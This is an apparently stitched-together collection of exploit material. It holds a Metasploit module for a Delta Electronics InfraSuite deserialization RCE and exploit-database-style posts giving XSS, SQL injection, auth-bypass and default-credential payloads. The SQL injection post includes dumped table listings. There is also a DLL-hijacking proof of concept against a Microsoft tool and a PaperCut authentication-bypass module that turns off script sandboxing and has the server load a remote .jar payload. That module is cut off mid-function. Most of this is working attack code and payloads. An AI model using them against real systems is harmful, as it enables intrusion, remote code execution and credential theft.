# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# Exploit module for CVE-2023-1133: Delta Electronics InfraSuite Device Master
# below v1.0.5 deserializes attacker-controlled packet data with
# BinaryFormatter inside the 'Device-Gateway-Status' process (see Description).
#
# Flow: +check+ fingerprints the InfraSuite Manager web UI over HTTP on
# INFRASUITE_PORT and reads the product version; +exploit+ opens a UDP socket
# to RPORT and +execute_command+ sends one framed datagram carrying the
# serialized gadget chain.
#
# Observable footprint (what a defender can look for): two unauthenticated
# GETs for login.html and js/webcfg.js, then a UDP datagram to the
# Device-Gateway-Status listener framed as 0x01 + 2-byte length +
# BinaryFormatter stream. The Notes below record the side effects
# (artifacts on disk, log entries, screen effects).
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Udp
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # RPORT (default 10100) is the UDP port the payload datagram is sent to
  # (presumably what connect_udp binds to, by framework convention).
  # INFRASUITE_PORT (default 80) and TARGETURI are only used by +check+ to
  # reach the InfraSuite Manager web UI.
  #
  # @param info [Hash] module metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',
        'Description' => %q{
          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an
          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'
          method of the 'Device-Gateway-Status' process.

          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,
          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
        },
        'Author' => [
          'Anonymous', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-1133'],
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],
          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']
        ],
        'Platform' => 'win',
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          # Dropper target: the CmdStager mixin stages an EXE through
          # PowerShell Invoke-WebRequest, calling execute_command per stage.
          [
            'Windows EXE Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'CmdStagerFlavor' => :psh_invokewebrequest
            }
          ],
          # CMD target: the encoded command payload is sent in one datagram.
          [
            'Windows CMD',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :windows_cmd
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-05-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      Opt::RPORT(10100),
      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),
      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])
    ])
  end

  # Fingerprints the target with two unauthenticated HTTP GET requests.
  #
  # 1. login.html must contain 'InfraSuite Manager Login'.
  # 2. js/webcfg.js must contain 'var devicemasterCfg' and a version:'...'
  #    literal; the captured version is compared against 1.0.5.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the first request gets no
  #   response; Safe when the page is not InfraSuite or the version is 1.0.5
  #   or later; Detected when the product is found but the version cannot be
  #   read; Appears for versions below 1.0.5.
  def check
    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'login.html')
    )

    # nil means no HTTP response came back at all; report Unknown, not Safe.
    return CheckCode::Unknown unless res

    unless res.body.include?('InfraSuite Manager Login')
      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')
    end

    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')
    )

    # Safe navigation: the second request may fail even though the first succeeded.
    unless res&.body&.include?('var devicemasterCfg')
      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
    end

    # Dotted numeric version with an optional single trailing letter.
    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)
    # MatchData#length counts the whole match plus captures, so > 1 means group 1 exists.
    unless version && version.length > 1
      return CheckCode::Detected('Failed to find version string')
    end

    version = version[1]
    vprint_status("Found version '#{version}' of InfraSuite Device Master")
    # NOTE(review): a trailing letter captured by the regex above is passed to
    # Rex::Version unchanged — confirm it compares as intended against '1.0.5'.
    r_vers = Rex::Version.new(version)

    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')

    CheckCode::Safe
  end

  # Opens the UDP socket and delivers the payload for the selected target.
  # The dropper target goes through the CmdStager mixin (which is expected to
  # call execute_command below for each staged command); the CMD target sends
  # the encoded command payload directly.
  def exploit
    connect_udp
    case target['Type']
    when :windows_dropper
      execute_cmdstager
    when :windows_cmd
      execute_command(payload.encoded)
    end
  end

  # Wraps +cmd+ in a BinaryFormatter-serialized ClaimsPrincipal gadget chain
  # and sends it as a single UDP datagram over the socket opened in +exploit+.
  #
  # Wire format, from the packet construction below: one byte 0x01, a 2-byte
  # big-endian length (pack('n')) of the serialized blob, then the blob. That
  # fixed framing plus the BinaryFormatter stream is the pattern a network
  # detection for this CVE would match on.
  #
  # @param cmd [String] command the gadget chain runs on the target
  # @param _opts [Hash] unused; kept for the CmdStager execute_command contract
  def execute_command(cmd, _opts = {})
    serialized = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :ClaimsPrincipal,
      formatter: :BinaryFormatter
    )

    # NOTE(review): String#length is a character count and pack('n') wraps
    # above 65535; both are only correct if the generator returns a
    # binary-encoded string shorter than 64 KiB — confirm.
    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
    udp_sock.put(pkt)
  end

  # Closes the UDP socket opened by +exploit+.
  def cleanup
    disconnect_udp
  end
end
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/20872/ │<br />│ Vendor : Expert IT Solution │<br />│ Software : Expert Restaurant eCommerce 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /food_details.php<br /><br />GET parameter 'food' is vulnerable to RXSS<br /><br />https://www.website/food_details.php?food=e11c0"><script>alert(1)</script>uuf50<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/20872/ │<br />│ Vendor : Expert IT Solution │<br />│ Software : Expert Restaurant eCommerce 1.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /food_details.php<br /><br />https://www.website/food_details.php?food=[SQLI]<br /><br /><br />GET parameter 'food' is vulnerable to SQL Injection<br /><br />---<br />Parameter: food (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 17 columns<br /> Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'sagor_****_restu'<br /><br /><br />fetching tables<br /><br />[34 tables]<br />+--------------------------+<br />| add_to_cart_view |<br />| admin_url |<br />| contact_manage |<br />| currencies |<br />| customer_info |<br />| delivery_live_status |<br />| expense_manage |<br />| food_category |<br />| food_dish_manage |<br />| food_dish_vari_man |<br />| food_field_variant |<br />| food_field_variant_value |<br />| food_order_confirm |<br />| food_review |<br />| food_sub_category |<br />| food_tag |<br />| gallery_manage |<br />| hall_manage |<br />| income_manage |<br />| kitchen_live_sta |<br />| menu_manage |<br />| opening_manage |<br />| order_accounts |<br />| order_other_address |<br />| page_manage |<br />| 
payment_gateway |<br />| shipping_charge |<br />| site_setting |<br />| slider_manage |<br />| social_manage |<br />| sup_ad_log |<br />| table_book |<br />| table_manage |<br />| team_manage |<br />+--------------------------+<br /><br /><br />fetching columns for table 'sup_ad_log'<br /><br />[5 columns]<br />+----------------+--------------+<br />| Column | Type |<br />+----------------+--------------+<br />| status | varchar(100) |<br />| id | int(11) |<br />| sup_admin_name | varchar(100) |<br />| sup_pass | varchar(100) |<br />| sup_user | varchar(100) |<br />+----------------+--------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : mvc-shop v0.5 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5 |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Register a new account, open the account control panel, choose to edit the member's profile, put the payload in the name field, then save the changes<br /><br />[+] Use Payload : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/chikoiquan.tanhongitcom/<br /> <br />== Greetings to :===========================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : NETXPERTS-CMS v0.1 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://netxperts.in/ | <br />| # Dork : "Designed by NETXPERTS" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1<br /><br />[+] https://127.0.0.1/sivasudartravels/admin/production.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Hi @ll,<br /><br />about a month ago Microsoft published HVCIScan-{amd,arm}64.exe, a<br />"Tool to check devices for compatibility with memory integrity (HVCI)"<br /><br />The "Install instructions" on the download page<br /><https://www.microsoft.com/en-us/download/105217> tell:<br /><br />| Download the hvciscan.exe for your system architecture (AMD64 or ARM64).<br />| From an elevated command window or PowerShell, run hvciscan.exe<br /><br />"ELEVATED" sounds good, especially when such a vulnerable tool is run<br />from the "Downloads" folder, where a file HVCIScan_amd64.exe.manifest,<br />HVCIScan_arm64.exe.manifest or VBSAPI.dll can be placed via "drive-by"<br />download or by the (unsuspecting) unelevated user who still abuses the<br />"protected administrator" account created during Windows setup.<br /><br />Oops, one step back: how did I determine<br />a) that HVCIScan-*.exe is vulnerable<br />b) these filenames?<br /><br />Open an UNELEVATED command window and run<br /> LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_amd64.exe<br />and/or<br /> LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_arm64.exe<br />then inspect the output.<br /><br />| Dump of file HVCIScan_amd64.exe<br />|<br />| File Type: EXECUTABLE IMAGE<br />|<br />| Image has the following dependencies:<br />|<br />| KERNEL32.dll<br />| msvcrt.dll<br />| VbsApi.dll<br /> ~~~~~~~~~~<br />| Section contains the following load config:<br />|<br />...<br />| 0000 Dependend load flags<br />...<br />| Summary<br />|<br />| 1000 .data<br />| 1000 .pdata<br />| 2000 .rdata<br />| 1000 .reloc<br />| 1000 .text<br /><br /><br />OUCH: the guys at M$FT built these tools without embedded "application<br /> manifest" (which would have been placed in a ".rsrc" section),<br /> so Windows will apply an external "application manifest", and<br /> without /DEPENDENTLOADFLAG:2048, so Windows will search dependent<br /> DLLs not listed as "Known DLL" in the "application directory"<br 
/> first.<br /><br />Both omissions^WBEGINNER'S MISTAKES allow to load and execute ARBITRARY<br />DLLs from ARBITRARY paths that run with the (ELEVATED) credentials of<br />the application!<br /><br />"Trustworthy Computing" anyone? Or "Security Development Lifecycle"?<br /><https://www.microsoft.com/en-us/securityengineering/sdl><br /><br /><br />Proof of concept #1:<br />~~~~~~~~~~~~~~~~~~~~<br /><br />a) Open an UNELEVATED command window in the directory where you saved<br /> HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe<br /><br />b) Create an empty file VbsApi.dll next to the executable:<br /><br /> COPY NUL: VbsApi.dll<br /><br />c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error<br /> message that VbsApi.dll can't be loaded.<br /><br /><br />Building a VbsApi.dll with the exports required by HVCIScan-a??64.exe<br />to actually load and execute VbsApi.dll is left as an exercise to the<br />reader.<br /><br />See <https://skanthak.homepage.t-online.de/minesweeper.html> if you<br />need help.<br /><br /><br />Proof of concept #2:<br />~~~~~~~~~~~~~~~~~~~~<br /><br />a) Create the text file HVCISCAN_amd64.exe.manifest respectively<br /> HVCISCAN_arm64.exe.manifest with the following content next to<br /> HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe:<br /><br />--- HVCISCAN_a??64.exe.manifest ---<br /><?xml version="1.0" encoding="UTF-8" standalone="yes" ?><br /><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"><br /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="KERNEL32.dll" /><br /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="msvcrt.dll" /><br /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="VbsApi.dll" /><br /> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><br /> <security><br /> <requestedPrivileges><br /> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /><br /> </requestedPrivileges><br /> </security><br /> </trustInfo><br /></assembly><br />--- EOF ---<br 
/><br /> Replace the UNC path \\SERVER\SHARE\arbitrary.dll with any local or<br /> remote path where you can create the specified file.<br /><br /> NOTE: the section "trustInfo" is optional.<br /><br /> NOTE: KERNEL32.dll and MSVCRT.dll are "Known DLLs".<br /><br />b) Create an empty file arbitrary.dll in the specified network share or<br /> local directory:<br /><br /> COPY NUL: \\SERVER\SHARE\arbitrary.dll<br /><br />c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error<br /> message that a required DLL or an entry point is not found.<br /><br /><br />Building \\SERVER\SHARE\arbitrary.dll with the exports required by<br />HVCIScan-a??64.exe to actually load and execute arbitrary.dll is left<br />as an exercise to the reader.<br /><br /><br />stay tuned, and far away from "tools" made in Redmond<br />Stefan Kanthak<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Anuranan SBAdmin 2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits) | <br />| # Vendor : https://anuranangroup.com/ | <br />| # Dork : Created by: Anuranan Group |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is that the default settings are left in place<br /> during installation of the script, and the default username and password remain in use<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user&pass= admin <br /><br />[+] https://127.0.0.1/hpgreenlandresort.com/admin/login.aspx<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# NOTE(review): CGI is not referenced anywhere in this file — possibly a leftover.
require 'cgi'

# Exploit module for CVE-2023-27350 (PaperCut NG authentication bypass leading
# to code execution in the builtin script engine).
#
# Flow: bypass_auth obtains a session via the SetupCompleted page; on major
# version >= 19 set_config_option turns on 'print-and-device.script.enabled'
# and turns off 'print.script.sandboxed'; exploit selects printer 'l1001';
# the HttpServer mixin starts and primer submits a print script that fetches a
# .jar from this module's HTTP server and runs it.
#
# Indicators a defender can look for, all visible in the requests below:
# a request for page/SetupCompleted, ConfigEditor quick-find/update posts,
# PrinterList/selectPrinter, a PrinterDetails script form submission, the two
# config option changes (logged per the Description), and an outbound fetch of
# a .jar by the PaperCut server. cleanup rolls the config options back.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  # Module metadata and options.
  #
  # TARGETURI defaults to '/app'; HTTPDELAY bounds how long the payload HTTP
  # server stays up in +exploit+. RPORT defaults to '9191' with SSL off.
  #
  # @param info [Hash] module metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PaperCut PaperCutNG Authentication Bypass',
        'Description' => %q{
          This module leverages an authentication bypass in PaperCut NG. If necessary it
          updates Papercut configuration options, specifically the 'print-and-device.script.enabled'
          and 'print.script.sandboxed' options to allow for arbitrary code execution running in
          the builtin RhinoJS engine.

          This module logs at most 2 events in the application log of papercut. Each event is tied
          to modifcation of server settings.
        },
        'License' => MSF_LICENSE,
        'Author' => ['catatonicprime'],
        'References' => [
          ['CVE', '2023-27350'],
          ['ZDI', '23-233'],
          ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],
          ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],
          ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
          ['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software']
        ],
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [ [ 'Automatic Target', {}] ],
        'Platform' => [ 'java' ],
        'Arch' => ARCH_JAVA,
        'Privileged' => true,
        'DisclosureDate' => '2023-03-13',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => '9191',
          'SSL' => 'false'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
      ], self.class
    )
    # Set by bypass_auth; nil means the bypass has not succeeded yet.
    @csrf_token = nil
    # [name, previous_value] pairs pushed by set_config_option, popped by cleanup.
    @config_cleanup = []
  end

  # Authentication bypass: a GET for service=page/SetupCompleted yields a
  # session without credentials. On success the cookie is kept in the cookie
  # jar ('keep_cookies'), @version_major is parsed from the page, and
  # @csrf_token is read from the inline 'var csrfToken' script ('' if absent).
  #
  # Detection note: this SetupCompleted request is the first step of the chain
  # and the simplest thing to look for in the access log.
  #
  # @return [String, nil] nil when the request fails or is not HTTP 200,
  #   otherwise the value assigned to @csrf_token (last expression)
  def bypass_auth
    # Attempt to generate a session & recover the anti-csrf token for future requests.
    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path),
        'keep_cookies' => true,
        'vars_get' => {
          'service' => 'page/SetupCompleted'
        }
      }
    )
    return nil unless res && res.code == 200

    vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")

    # Parse the application version from the response for future decisions.
    product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1]
    if product_details.nil?
      product_details = res.get_html_document.xpath('//span[contains(@class, "version")]')
    end
    # NOTE(review): if neither XPath yields a "major.minor" string, version_match
    # is nil and the next line raises NoMethodError instead of returning nil.
    version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)')
    @version_major = Integer(version_match[:major])
    match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
    # NOTE(review): the token is recorded but none of the requests in this file
    # send it — presumably these endpoints do not require it; confirm.
    @csrf_token = match ? match[:csrf] : ''
  end

  # Reads one server config value through the ConfigEditor quick-find form.
  # The quick-find POST is stateful on the server side (the original comment
  # calls it "setting the tapestry state"): the value input read back here, and
  # the update in set_config_option, refer to the option quick-found last, so
  # the order of these requests matters.
  #
  # @param name [String] config option name as shown in the ConfigEditor
  # @return [String, nil] the current value, or nil when the request fails or
  #   the result table does not contain exactly that one option
  def get_config_option(name)
    # 1) do a quickfind (setting the tapestry state)
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'keep_cookies' => true,
        'headers' => {
          'Origin' => full_uri
        },
        'vars_post' => {
          'service' => 'direct/1/ConfigEditor/quickFindForm',
          'sp' => 'S0',
          'Form0' => '$TextField,doQuickFind,clear',
          '$TextField' => name,
          'doQuickFind' => 'Go'
        }
      }
    )
    # 2) parse and return the result
    return nil unless res && res.code == 200 && (html = res.get_html_document)
    # xpath returns a node set, which is truthy even when empty, so this line
    # is effectively just the assignment; the real filter is the count check below.
    return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']"))
    return nil unless td.count == 1 && td.text == name

    # NOTE(review): raises NoMethodError if the value input is missing from the page.
    value_input = html.xpath("//input[@name='$TextField$0']")
    value_input[0]['value']
  end

  # Sets a server config option through the ConfigEditor form and records the
  # previous value so +cleanup+ can restore it. The early return skips the POST
  # when the value already matches.
  #
  # @param name [String] option name
  # @param value [String] desired value
  # @param rollback [Boolean] true when called from cleanup; suppresses
  #   recording a further cleanup entry
  # @raise calls fail_with(Failure::NotVulnerable) when the update POST does not return 200
  def set_config_option(name, value, rollback)
    # set name:value pair(s)
    # NOTE(review): current_value is nil when get_config_option finds nothing;
    # the cleanup entry then stores nil and the rollback POST sends it as the
    # new value — confirm that is intended.
    current_value = get_config_option(name)
    if current_value == value
      # NOTE(review): the stray ")" in this and the next message is a typo in the log text.
      vprint_good("Server option '#{name}' already set to '#{value}')")
      return
    end

    vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'keep_cookies' => true,
        'headers' => {
          'Origin' => full_uri
        },
        'vars_post' => {
          'service' => 'direct/1/ConfigEditor/$Form',
          'sp' => 'S1',
          'Form1' => '$TextField$0,$Submit,$Submit$0',
          '$TextField$0' => value,
          '$Submit' => 'Update'
        }
      }
    )
    fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200
    # skip storing the cleanup change if this is rolling back a previous change
    @config_cleanup.push([name, current_value]) unless rollback
  end

  # Restores the config options changed by set_config_option, most recent
  # first, after the framework's own cleanup. Each rollback is itself a config
  # change on the target (and, per the Description, a logged event).
  def cleanup
    super
    # Presumably defensive, in case cleanup runs before initialize set the array.
    if @config_cleanup.nil?
      return
    end

    until @config_cleanup.empty?
      cfg = @config_cleanup.pop
      vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'")
      set_config_option(cfg[0], cfg[1], true)
    end
  end

  # HttpServer hook (presumably invoked once the payload server is listening).
  # Submits a print script for printer 'l1001' whose body loads
  # "#{payload_uri}.jar" via java.net.URLClassLoader and runs
  # metasploit.Payload, i.e. the PaperCut server reaches back to this module's
  # HTTP server. The saved script body is the on-disk artifact a defender can
  # inspect on the server (look for URLClassLoader in printer scripts).
  #
  # @raise calls fail_with(Failure::NotVulnerable) when the form POST does not return 200
  def primer
    payload_uri = get_uri
    # The bare `s;` statement is sent as part of the script; its purpose is not
    # evident from this file.
    script = <<~SCRIPT
      var urls = [new java.net.URL("#{payload_uri}.jar")];
      var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
      s;
    SCRIPT

    # The number of parameters passed changed in version 17.
    form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0'
    if @version_major > 16
      form0 += ',$Submit$1'
    end
    # 6) Trigger the code execution the printer_id
    # '$Submit$1' is posted regardless of whether form0 lists it.
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'keep_cookies' => true,
        'headers' => {
          'Origin' => full_uri
        },
        'vars_post' => {
          'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
          'sp' => 'S0',
          'Form0' => form0,
          'enablePrintScript' => 'on',
          '$Submit$1' => 'Apply',
          'printerId' => 'l1001',
          'scriptBody' => script
        }
      }
    )
    fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200
  end

  # AutoCheck hook: the target is reported Vulnerable iff the SetupCompleted
  # bypass returns a session. This check is not passive — it creates a
  # session on the target.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    # For the check command
    bypass_success = bypass_auth
    if bypass_success.nil?
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Vulnerable
  end

  # Main flow. Steps 1-3 and 5 are numbered in the comments below (4 is
  # skipped; step 6 is in primer). The HTTP server started by +super+ serves
  # the payload and runs primer; it is bounded by HTTPDELAY, and the
  # Timeout::Error raised when that elapses is the normal shutdown path, hence
  # the empty method-level rescue.
  #
  # @raise calls fail_with(Failure::NotVulnerable) when the bypass or the
  #   printer selection fails
  def exploit
    # Main function
    # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
    # When AutoCheck already ran check, @csrf_token is a String and the bypass
    # is not repeated; it stays nil only if bypass_auth returned early.
    bypass_auth unless @csrf_token
    if @csrf_token.nil?
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    # Sandboxing wasn't introduced until version 19
    if @version_major >= 19
      # 2) Enable scripts, if needed
      set_config_option('print-and-device.script.enabled', 'Y', false)

      # 3) Disable sandboxing, if needed
      set_config_option('print.script.sandboxed', 'N', false)
    end
    # 5) Select the printer, this loads it into the tapestry session to be modified
    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path),
        'keep_cookies' => true,
        'headers' => {
          'Origin' => full_uri
        },
        'vars_get' => {
          'service' => 'direct/1/PrinterList/selectPrinter',
          'sp' => 'l1001'
        }
      }
    )
    fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200

